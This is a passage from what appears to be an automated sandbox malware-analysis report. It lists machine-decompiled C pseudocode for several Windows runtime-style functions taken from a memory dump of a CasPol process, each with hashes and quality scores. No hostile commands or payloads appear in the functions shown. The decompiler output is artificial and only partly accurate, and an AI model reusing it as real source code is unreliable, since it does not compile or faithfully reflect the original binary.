                                                                  • Instruction ID: cb9f8851b508d77de87d939ebbb802a111c22930e8d23a063636d01a254db1b6
                                                                  • Opcode Fuzzy Hash: cc007f3044028a4428e02a4a9047b92b36f57703fd20714d6d08a154055cf9b3
                                                                  • Instruction Fuzzy Hash: BA31E6726047919BC321DF28C844AABB7E5FFD8700F054A2EF995877A0E730E904CBA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 97%
                                                                  			E014261A0(signed int* __ecx) {
                                                                  				intOrPtr _v8;
                                                                  				char _v12;
                                                                  				intOrPtr* _v16;
                                                                  				intOrPtr _v20;
                                                                  				intOrPtr _t30;
                                                                  				intOrPtr _t31;
                                                                  				void* _t32;
                                                                  				intOrPtr _t33;
                                                                  				intOrPtr _t37;
                                                                  				intOrPtr _t49;
                                                                  				signed int _t51;
                                                                  				intOrPtr _t52;
                                                                  				signed int _t54;
                                                                  				void* _t59;
                                                                  				signed int* _t61;
                                                                  				intOrPtr* _t64;
                                                                  
                                                                  				_t61 = __ecx;
                                                                  				_v12 = 0;
                                                                  				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                                  				_v16 = __ecx;
                                                                  				_v8 = 0;
                                                                  				if(_t30 == 0) {
                                                                  					L6:
                                                                  					_t31 = 0;
                                                                  					L7:
                                                                  					return _t31;
                                                                  				}
                                                                  				_t32 = _t30 + 0x5d8;
                                                                  				if(_t32 == 0) {
                                                                  					goto L6;
                                                                  				}
                                                                  				_t59 = _t32 + 0x30;
                                                                  				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                                                  					goto L6;
                                                                  				}
                                                                  				if(__ecx != 0) {
                                                                  					 *((intOrPtr*)(__ecx)) = 0;
                                                                  					 *((intOrPtr*)(__ecx + 4)) = 0;
                                                                  				}
                                                                  				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                                                  					_t51 =  *(_t32 + 0x10);
                                                                  					_t33 = _t32 + 0x10;
                                                                  					_v20 = _t33;
                                                                  					_t54 =  *(_t33 + 4);
                                                                  					if((_t51 | _t54) == 0) {
                                                                  						_t37 = L01425E50(0x13d67cc, 0, 0,  &_v12);
                                                                  						if(_t37 != 0) {
                                                                  							goto L6;
                                                                  						}
                                                                  						_t52 = _v8;
                                                                  						asm("lock cmpxchg8b [esi]");
                                                                  						_t64 = _v16;
                                                                  						_t49 = _t37;
                                                                  						_v20 = 0;
                                                                  						if(_t37 == 0) {
                                                                  							if(_t64 != 0) {
                                                                  								 *_t64 = _v12;
                                                                  								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                                                  							}
                                                                  							L014C9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                                                  							_t31 = 1;
                                                                  							goto L7;
                                                                  						}
                                                                  						L013FF7C0(_t52, _v12, _t52, 0);
                                                                  						if(_t64 != 0) {
                                                                  							 *_t64 = _t49;
                                                                  							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                                                  						}
                                                                  						L12:
                                                                  						_t31 = 1;
                                                                  						goto L7;
                                                                  					}
                                                                  					if(_t61 != 0) {
                                                                  						 *_t61 = _t51;
                                                                  						_t61[1] = _t54;
                                                                  					}
                                                                  					goto L12;
                                                                  				} else {
                                                                  					goto L6;
                                                                  				}
                                                                  			}



















                                                                  0x01467656
                                                                  0x00000000
                                                                  0x01467656
                                                                  0x01467644
                                                                  0x01467646
                                                                  0x01467648
                                                                  0x01467648
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0a291524e9b21f76d22cfc6f8e1a0b46badb7ab2a05df3e0ef0450ce2d9f68ba
                                                                  • Instruction ID: 9b4382f418b08edb2148f718081afb9bf73285d457b7bd3f4cf51b20105ff948
                                                                  • Opcode Fuzzy Hash: 0a291524e9b21f76d22cfc6f8e1a0b46badb7ab2a05df3e0ef0450ce2d9f68ba
                                                                  • Instruction Fuzzy Hash: 47315C716057118FE360CF1DC840B27BBE8EB98B18F55496EE99897361E7B0EC44CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 95%
                                                                  			E013FAA16(signed short* __ecx) {
                                                                  				signed int _v8;
                                                                  				intOrPtr _v12;
                                                                  				signed short _v16;
                                                                  				intOrPtr _v20;
                                                                  				signed short _v24;
                                                                  				signed short _v28;
                                                                  				void* _v32;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				intOrPtr _t25;
                                                                  				signed short _t38;
                                                                  				signed short* _t42;
                                                                  				signed int _t44;
                                                                  				signed short* _t52;
                                                                  				signed short _t53;
                                                                  				signed int _t54;
                                                                  
                                                                  				_v8 =  *0x14ed360 ^ _t54;
                                                                  				_t42 = __ecx;
                                                                  				_t44 =  *__ecx & 0x0000ffff;
                                                                  				_t52 =  &(__ecx[2]);
                                                                  				_t51 = _t44 + 2;
                                                                  				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                                                  					L4:
                                                                  					_t25 =  *0x14e7b9c; // 0x0
                                                                  					_t53 = L01414620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                                                  					__eflags = _t53;
                                                                  					if(_t53 == 0) {
                                                                  						L3:
                                                                  						return L0143B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                                                  					} else {
                                                                  						E0143F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                                                  						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                  						L2:
                                                                  						_t51 = 4;
                                                                  						if(L01406C59(_t53, _t51, _t58) != 0) {
                                                                  							_t28 = L01425E50(0x13dc338, 0, 0,  &_v32);
                                                                  							__eflags = _t28;
                                                                  							if(_t28 == 0) {
                                                                  								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                                                  								__eflags = _t38;
                                                                  								_v24 = _t53;
                                                                  								_v16 = _t38;
                                                                  								_v20 = 0;
                                                                  								_v12 = 0;
                                                                  								E0142B230(_v32, _v28, 0x13dc2d8, 1,  &_v24);
                                                                  								_t28 = L013FF7A0(_v32, _v28);
                                                                  							}
                                                                  							__eflags = _t53 -  *_t52;
                                                                  							if(_t53 !=  *_t52) {
                                                                  								_t28 = L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                                  							}
                                                                  						}
                                                                  						goto L3;
                                                                  					}
                                                                  				}
                                                                  				_t53 =  *_t52;
                                                                  				_t44 = _t44 >> 1;
                                                                  				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                                                  				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                                                  					goto L4;
                                                                  				}
                                                                  				goto L2;
                                                                  			}





















                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ac4cd60a833c967fadeb2d7891b08b399f17531744b943d57c8dfadafa04384e
                                                                  • Instruction ID: db87bbd4c12852c62254985baf33dabc9b3f4c29aaea4e6223f32e8e4be02e87
                                                                  • Opcode Fuzzy Hash: ac4cd60a833c967fadeb2d7891b08b399f17531744b943d57c8dfadafa04384e
                                                                  • Instruction Fuzzy Hash: E2310372A0021AABDF11DFA9CD41ABFB7B8EF14700F04406EF905EB261E7349954CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 58%
                                                                  			E01434A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                  				signed int _v8;
                                                                  				signed int* _v12;
                                                                  				char _v13;
                                                                  				signed int _v16;
                                                                  				char _v21;
                                                                  				signed int* _v24;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				signed int _t29;
                                                                  				signed int* _t32;
                                                                  				signed int* _t41;
                                                                  				signed int _t42;
                                                                  				void* _t43;
                                                                  				intOrPtr* _t51;
                                                                  				void* _t52;
                                                                  				signed int _t53;
                                                                  				signed int _t58;
                                                                  				void* _t59;
                                                                  				signed int _t60;
                                                                  				signed int _t62;
                                                                  
                                                                  				_t49 = __edx;
                                                                  				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                                                  				_t26 =  *0x14ed360 ^ _t62;
                                                                  				_v8 =  *0x14ed360 ^ _t62;
                                                                  				_t41 = __ecx;
                                                                  				_t51 = __edx;
                                                                  				_v12 = __ecx;
                                                                  				if(_a4 == 0) {
                                                                  					if(_a8 != 0) {
                                                                  						goto L1;
                                                                  					}
                                                                  					_v13 = 1;
                                                                  					E01412280(_t26, 0x14e8608);
                                                                  					_t58 =  *_t41;
                                                                  					if(_t58 == 0) {
                                                                  						L11:
                                                                  						L0140FFB0(_t41, _t51, 0x14e8608);
                                                                  						L2:
                                                                  						 *0x14eb1e0(_a4, _a8);
                                                                  						_t42 =  *_t51();
                                                                  						if(_t42 == 0) {
                                                                  							_t29 = 0;
                                                                  							L5:
                                                                  							_pop(_t52);
                                                                  							_pop(_t59);
                                                                  							_pop(_t43);
                                                                  							return L0143B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                                                  						}
                                                                  						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                                                  						if(_v21 != 0) {
                                                                  							_t53 = 0;
                                                                  							E01412280(_t28, 0x14e8608);
                                                                  							_t32 = _v24;
                                                                  							if( *_t32 == _t58) {
                                                                  								 *_t32 = _t42;
                                                                  								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                                                  								if(_t58 != 0) {
                                                                  									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                                                  									asm("sbb edi, edi");
                                                                  									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                                                  								}
                                                                  							}
                                                                  							L0140FFB0(_t42, _t53, 0x14e8608);
                                                                  							if(_t53 != 0) {
                                                                  								L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                                  							}
                                                                  						}
                                                                  						_t29 = _t42;
                                                                  						goto L5;
                                                                  					}
                                                                  					if( *((char*)(_t58 + 0x40)) != 0) {
                                                                  						L10:
                                                                  						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                                                  						L0140FFB0(_t41, _t51, 0x14e8608);
                                                                  						_t29 = _t58;
                                                                  						goto L5;
                                                                  					}
                                                                  					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                                  					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                                  						goto L11;
                                                                  					}
                                                                  					goto L10;
                                                                  				}
                                                                  				L1:
                                                                  				_v13 = 0;
                                                                  				_t58 = 0;
                                                                  				goto L2;
                                                                  			}

























                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7aca8750c56209a788a626a6ad1a4a88c84f322f0564b3549d6f62b41c513842
                                                                  • Instruction ID: 399cd1a906db26b260efb2f82a9144faf00f9cc190942cbcb7f3b41c6e9ffae4
                                                                  • Opcode Fuzzy Hash: 7aca8750c56209a788a626a6ad1a4a88c84f322f0564b3549d6f62b41c513842
                                                                  • Instruction Fuzzy Hash: E131F5322012119BC732EF69C944B6BBBE4FBD9610F18042FE85547271CBB0D806CB85
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 76%
                                                                  			E013F9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
                                                                  				signed int _t53;
                                                                  				signed int _t56;
                                                                  				signed int* _t60;
                                                                  				signed int _t63;
                                                                  				signed int _t66;
                                                                  				signed int _t69;
                                                                  				void* _t70;
                                                                  				intOrPtr* _t72;
                                                                  				void* _t78;
                                                                  				void* _t79;
                                                                  				signed int _t80;
                                                                  				intOrPtr _t82;
                                                                  				void* _t85;
                                                                  				void* _t88;
                                                                  				void* _t89;
                                                                  
                                                                  				_t84 = __esi;
                                                                  				_t70 = __ecx;
                                                                  				_t68 = __ebx;
                                                                  				_push(0x2c);
                                                                  				_push(0x14cf6e8);
                                                                  				E0144D0E8(__ebx, __edi, __esi);
                                                                  				 *((char*)(_t85 - 0x1d)) = 0;
                                                                  				_t82 =  *((intOrPtr*)(_t85 + 8));
                                                                  				if(_t82 == 0) {
                                                                  					L4:
                                                                  					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
                                                                  						E014C88F5(_t68, _t70, _t78, _t82, _t84, __eflags);
                                                                  					}
                                                                  					L5:
                                                                  					return E0144D130(_t68, _t82, _t84);
                                                                  				}
                                                                  				_t88 = _t82 -  *0x14e86c0; // 0xf907b0
                                                                  				if(_t88 == 0) {
                                                                  					goto L4;
                                                                  				}
                                                                  				_t89 = _t82 -  *0x14e86b8; // 0x0
                                                                  				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                                                  					goto L4;
                                                                  				} else {
                                                                  					E01412280(_t82 + 0xe0, _t82 + 0xe0);
                                                                  					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                                                  					__eflags =  *((char*)(_t82 + 0xe5));
                                                                  					if(__eflags != 0) {
                                                                  						E014C88F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                                                  						goto L12;
                                                                  					} else {
                                                                  						__eflags =  *((char*)(_t82 + 0xe4));
                                                                  						if( *((char*)(_t82 + 0xe4)) == 0) {
                                                                  							 *((char*)(_t82 + 0xe4)) = 1;
                                                                  							_push(_t82);
                                                                  							_push( *((intOrPtr*)(_t82 + 0x24)));
                                                                  							L0143AFD0();
                                                                  						}
                                                                  						while(1) {
                                                                  							_t60 = _t82 + 8;
                                                                  							 *(_t85 - 0x2c) = _t60;
                                                                  							_t68 =  *_t60;
                                                                  							_t80 = _t60[1];
                                                                  							 *(_t85 - 0x28) = _t68;
                                                                  							 *(_t85 - 0x24) = _t80;
                                                                  							while(1) {
                                                                  								L10:
                                                                  								__eflags = _t80;
                                                                  								if(_t80 == 0) {
                                                                  									break;
                                                                  								}
                                                                  								_t84 = _t68;
                                                                  								 *(_t85 - 0x30) = _t80;
                                                                  								 *(_t85 - 0x24) = _t80 - 1;
                                                                  								asm("lock cmpxchg8b [edi]");
                                                                  								_t68 = _t84;
                                                                  								 *(_t85 - 0x28) = _t68;
                                                                  								 *(_t85 - 0x24) = _t80;
                                                                  								__eflags = _t68 - _t84;
                                                                  								_t82 =  *((intOrPtr*)(_t85 + 8));
                                                                  								if(_t68 != _t84) {
                                                                  									continue;
                                                                  								}
                                                                  								__eflags = _t80 -  *(_t85 - 0x30);
                                                                  								if(_t80 !=  *(_t85 - 0x30)) {
                                                                  									continue;
                                                                  								}
                                                                  								__eflags = _t80;
                                                                  								if(_t80 == 0) {
                                                                  									break;
                                                                  								}
                                                                  								_t63 = 0;
                                                                  								 *(_t85 - 0x34) = 0;
                                                                  								_t84 = 0;
                                                                  								__eflags = 0;
                                                                  								while(1) {
                                                                  									 *(_t85 - 0x3c) = _t84;
                                                                  									__eflags = _t84 - 3;
                                                                  									if(_t84 >= 3) {
                                                                  										break;
                                                                  									}
                                                                  									__eflags = _t63;
                                                                  									if(_t63 != 0) {
                                                                  										L40:
                                                                  										_t84 =  *_t63;
                                                                  										__eflags = _t84;
                                                                  										if(_t84 != 0) {
                                                                  											_t84 =  *(_t84 + 4);
                                                                  											__eflags = _t84;
                                                                  											if(_t84 != 0) {
                                                                  												 *0x14eb1e0(_t63, _t82);
                                                                  												 *_t84();
                                                                  											}
                                                                  										}
                                                                  										do {
                                                                  											_t60 = _t82 + 8;
                                                                  											 *(_t85 - 0x2c) = _t60;
                                                                  											_t68 =  *_t60;
                                                                  											_t80 = _t60[1];
                                                                  											 *(_t85 - 0x28) = _t68;
                                                                  											 *(_t85 - 0x24) = _t80;
                                                                  											goto L10;
                                                                  										} while (_t63 == 0);
                                                                  										goto L40;
                                                                  									}
                                                                  									_t69 = 0;
                                                                  									__eflags = 0;
                                                                  									while(1) {
                                                                  										 *(_t85 - 0x38) = _t69;
                                                                  										__eflags = _t69 -  *0x14e84c0;
                                                                  										if(_t69 >=  *0x14e84c0) {
                                                                  											break;
                                                                  										}
                                                                  										__eflags = _t63;
                                                                  										if(_t63 != 0) {
                                                                  											break;
                                                                  										}
                                                                  										_t66 = E014C9063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                                                  										__eflags = _t66;
                                                                  										if(_t66 == 0) {
                                                                  											_t63 = 0;
                                                                  											__eflags = 0;
                                                                  										} else {
                                                                  											_t63 = _t66 + 0xfffffff4;
                                                                  										}
                                                                  										 *(_t85 - 0x34) = _t63;
                                                                  										_t69 = _t69 + 1;
                                                                  									}
                                                                  									_t84 = _t84 + 1;
                                                                  								}
                                                                  								__eflags = _t63;
                                                                  							}
                                                                  							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                                                  							 *((char*)(_t82 + 0xe5)) = 1;
                                                                  							 *((char*)(_t85 - 0x1d)) = 1;
                                                                  							L12:
                                                                  							 *(_t85 - 4) = 0xfffffffe;
                                                                  							E013F922A(_t82);
                                                                  							_t53 = E01417D50();
                                                                  							__eflags = _t53;
                                                                  							if(_t53 != 0) {
                                                                  								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                  							} else {
                                                                  								_t56 = 0x7ffe0386;
                                                                  							}
                                                                  							__eflags =  *_t56;
                                                                  							if( *_t56 != 0) {
                                                                  								_t56 = E014C8B58(_t82);
                                                                  							}
                                                                  							__eflags =  *((char*)(_t85 - 0x1d));
                                                                  							if( *((char*)(_t85 - 0x1d)) != 0) {
                                                                  								__eflags = _t82 -  *0x14e86c0; // 0xf907b0
                                                                  								if(__eflags != 0) {
                                                                  									__eflags = _t82 -  *0x14e86b8; // 0x0
                                                                  									if(__eflags == 0) {
                                                                  										_t79 = 0x14e86bc;
                                                                  										_t72 = 0x14e86b8;
                                                                  										goto L18;
                                                                  									}
                                                                  									__eflags = _t56 | 0xffffffff;
                                                                  									asm("lock xadd [edi], eax");
                                                                  									if(__eflags == 0) {
                                                                  										E013F9240(_t68, _t82, _t82, _t84, __eflags);
                                                                  									}
                                                                  								} else {
                                                                  									_t79 = 0x14e86c4;
                                                                  									_t72 = 0x14e86c0;
                                                                  									L18:
                                                                  									E01429B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                                                  								}
                                                                  							}
                                                                  							goto L5;
                                                                  						}
                                                                  					}
                                                                  				}
                                                                  			}



















                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8ea0b5034ccc5919679054df04f3876bd841a8718789c6c2d76f1562a600797e
                                                                  • Instruction ID: a7ccf3d460929a4278461c7b85644e001a13287c8827db6b315f2d1a3554d846
                                                                  • Opcode Fuzzy Hash: 8ea0b5034ccc5919679054df04f3876bd841a8718789c6c2d76f1562a600797e
                                                                  • Instruction Fuzzy Hash: EA31C575A00246DFEB25DF6CC048B9DBBF1BB5835CF14816EE60467362C334A980CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 53%
                                                                  			E01410050(void* __ecx) {
                                                                  				signed int _v8;
                                                                  				void* __ebx;
                                                                  				void* __edi;
                                                                  				void* __esi;
                                                                  				void* __ebp;
                                                                  				intOrPtr* _t30;
                                                                  				intOrPtr* _t31;
                                                                  				signed int _t34;
                                                                  				void* _t40;
                                                                  				void* _t41;
                                                                  				signed int _t44;
                                                                  				intOrPtr _t47;
                                                                  				signed int _t58;
                                                                  				void* _t59;
                                                                  				void* _t61;
                                                                  				void* _t62;
                                                                  				signed int _t64;
                                                                  
                                                                  				_push(__ecx);
                                                                  				_v8 =  *0x14ed360 ^ _t64;
                                                                  				_t61 = __ecx;
                                                                  				_t2 = _t61 + 0x20; // 0x20
                                                                  				L01429ED0(_t2, 1, 0);
                                                                  				_t52 =  *(_t61 + 0x8c);
                                                                  				_t4 = _t61 + 0x8c; // 0x8c
                                                                  				_t40 = _t4;
                                                                  				do {
                                                                  					_t44 = _t52;
                                                                  					_t58 = _t52 & 0x00000001;
                                                                  					_t24 = _t44;
                                                                  					asm("lock cmpxchg [ebx], edx");
                                                                  					_t52 = _t44;
                                                                  				} while (_t52 != _t44);
                                                                  				if(_t58 == 0) {
                                                                  					L7:
                                                                  					_pop(_t59);
                                                                  					_pop(_t62);
                                                                  					_pop(_t41);
                                                                  					return L0143B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                                                  				}
                                                                  				asm("lock xadd [esi], eax");
                                                                  				_t47 =  *[fs:0x18];
                                                                  				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                                                  				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                                                  				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                  				if(_t30 != 0) {
                                                                  					if( *_t30 == 0) {
                                                                  						goto L4;
                                                                  					}
                                                                  					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                  					L5:
                                                                  					if( *_t31 != 0) {
                                                                  						_t18 = _t61 + 0x78; // 0x78
                                                                  						E014C8A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                                                  					}
                                                                  					_t52 =  *(_t61 + 0x5c);
                                                                  					_t11 = _t61 + 0x78; // 0x78
                                                                  					_t34 = L01429702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                                                  					_t24 = _t34 | 0xffffffff;
                                                                  					asm("lock xadd [esi], eax");
                                                                  					if((_t34 | 0xffffffff) == 0) {
                                                                  						 *0x14eb1e0(_t61);
                                                                  						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                                                  					}
                                                                  					goto L7;
                                                                  				}
                                                                  				L4:
                                                                  				_t31 = 0x7ffe0386;
                                                                  				goto L5;
                                                                  			}

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9f368ad3e20dc872982a81365d4d3c99c98ceb4f5c7e7d49f02624b5ed6cba50
                                                                  • Instruction ID: 59fd4a72857d54256c28697fc8257e798b1031db0962de98b24fd3dcb54aaa38
                                                                  • Opcode Fuzzy Hash: 9f368ad3e20dc872982a81365d4d3c99c98ceb4f5c7e7d49f02624b5ed6cba50
                                                                  • Instruction Fuzzy Hash: 9331CE71601B04CFD722CF28D840B97B7E5FF88714F14856EE59A87BA4EB35A841CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 82%
                                                                  			E014390AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                                                  				intOrPtr* _v0;
                                                                  				void* _v8;
                                                                  				signed int _v12;
                                                                  				intOrPtr _v16;
                                                                  				char _v36;
                                                                  				void* _t38;
                                                                  				intOrPtr _t41;
                                                                  				void* _t44;
                                                                  				signed int _t45;
                                                                  				intOrPtr* _t49;
                                                                  				signed int _t57;
                                                                  				signed int _t58;
                                                                  				intOrPtr* _t59;
                                                                  				void* _t62;
                                                                  				void* _t63;
                                                                  				void* _t65;
                                                                  				void* _t66;
                                                                  				signed int _t69;
                                                                  				intOrPtr* _t70;
                                                                  				void* _t71;
                                                                  				intOrPtr* _t72;
                                                                  				intOrPtr* _t73;
                                                                  				char _t74;
                                                                  
                                                                  				_t65 = __edx;
                                                                  				_t57 = _a4;
                                                                  				_t32 = __ecx;
                                                                  				_v8 = __edx;
                                                                  				_t3 = _t32 + 0x14c; // 0x14c
                                                                  				_t70 = _t3;
                                                                  				_v16 = __ecx;
                                                                  				_t72 =  *_t70;
                                                                  				while(_t72 != _t70) {
                                                                  					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                                                  						L24:
                                                                  						_t72 =  *_t72;
                                                                  						continue;
                                                                  					}
                                                                  					_t30 = _t72 + 0x10; // 0x10
                                                                  					if(L0144D4F0(_t30, _t65, _t57) == _t57) {
                                                                  						return 0xb7;
                                                                  					}
                                                                  					_t65 = _v8;
                                                                  					goto L24;
                                                                  				}
                                                                  				_t61 = _t57;
                                                                  				_push( &_v12);
                                                                  				_t66 = 0x10;
                                                                  				if(L0142E5E0(_t57, _t66) < 0) {
                                                                  					return 0x216;
                                                                  				}
                                                                  				_t73 = L01414620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                                                  				if(_t73 == 0) {
                                                                  					_t38 = 0xe;
                                                                  					return _t38;
                                                                  				}
                                                                  				_t9 = _t73 + 0x10; // 0x10
                                                                  				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                                                  				E0143F3E0(_t9, _v8, _t57);
                                                                  				_t41 =  *_t70;
                                                                  				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                                                  					_t62 = 3;
                                                                  					asm("int 0x29");
                                                                  					_push(_t62);
                                                                  					_push(_t57);
                                                                  					_push(_t73);
                                                                  					_push(_t70);
                                                                  					_t71 = _t62;
                                                                  					_t74 = 0;
                                                                  					_v36 = 0;
                                                                  					_t63 = E0142A2F0(_t62, _t71, 1, 6,  &_v36);
                                                                  					if(_t63 == 0) {
                                                                  						L20:
                                                                  						_t44 = 0x57;
                                                                  						return _t44;
                                                                  					}
                                                                  					_t45 = _v12;
                                                                  					_t58 = 0x1c;
                                                                  					if(_t45 < _t58) {
                                                                  						goto L20;
                                                                  					}
                                                                  					_t69 = _t45 / _t58;
                                                                  					if(_t69 == 0) {
                                                                  						L19:
                                                                  						return 0xe8;
                                                                  					}
                                                                  					_t59 = _v0;
                                                                  					do {
                                                                  						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                                                  							goto L18;
                                                                  						}
                                                                  						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                                                  						 *_t59 = _t49;
                                                                  						if( *_t49 != 0x53445352) {
                                                                  							goto L18;
                                                                  						}
                                                                  						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                                                  						return 0;
                                                                  						L18:
                                                                  						_t63 = _t63 + 0x1c;
                                                                  						_t74 = _t74 + 1;
                                                                  					} while (_t74 < _t69);
                                                                  					goto L19;
                                                                  				}
                                                                  				 *_t73 = _t41;
                                                                  				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                                                  				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                                                  				 *_t70 = _t73;
                                                                  				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                                                  				return 0;
                                                                  			}

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                  • Instruction ID: dcc6dd305496df8bf9f4f45a3541b8c94825c0ab1e81ae7039ca6c6d4c697fa7
                                                                  • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                                                  • Instruction Fuzzy Hash: 24214171A00205EFEB21DF59C584A9AFBF8EB98754F14887FE985A7220D370AD45CB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 59%
                                                                  			E01423B7A(void* __ecx) {
                                                                  				signed int _v8;
